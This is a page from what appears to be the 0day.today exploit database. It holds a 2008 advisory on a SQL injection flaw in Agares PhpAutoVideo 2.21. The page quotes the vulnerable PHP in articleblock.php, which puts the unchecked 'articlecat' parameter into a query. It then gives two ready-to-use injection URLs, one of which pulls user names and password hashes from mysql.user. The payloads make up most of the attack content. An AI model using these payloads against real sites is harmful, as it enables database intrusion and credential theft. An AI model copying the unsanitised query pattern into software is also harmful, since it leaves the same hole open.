[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Agares PhpAutoVideo 2.21 (articlecat) SQL Injection Vulnerability

Author
ka0x
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2488
Category
web applications
Date add
12-01-2008
Platform
unsorted
=================================================================
Agares PhpAutoVideo 2.21 (articlecat) SQL Injection Vulnerability
=================================================================



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Agares PhpAutoVideo v2.21 Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

D.O.M TEAM 2008
we are: ka0x, an0de, xarnuz
bug found by ka0x
#from spain

vulnerability in /includes/articleblock.php

vuln code:
------------------------------------------------------------------
$cat = $_GET['articlecat'];
if ($cat == NULL){ $sql = "SELECT * FROM amcms_articles;"; }
else{ $sql = "SELECT * FROM amcms_articles WHERE catid=$cat;"; }
------------------------------------------------------------------

Your user needs to be root@localhost or administrator mysql, check:
http://[host]/includes/articleblock.php?articlecat=-1/**/union/**/select/**/user()/*

user and password from mysql.user:
http://[host]/phpautovideo/includes/articleblock.php?articlecat=-1/**/union/**/select/**/concat(user,0x203a3a20,password)/**/from/**/mysql.user/*




#  0day.today [2024-12-25]  #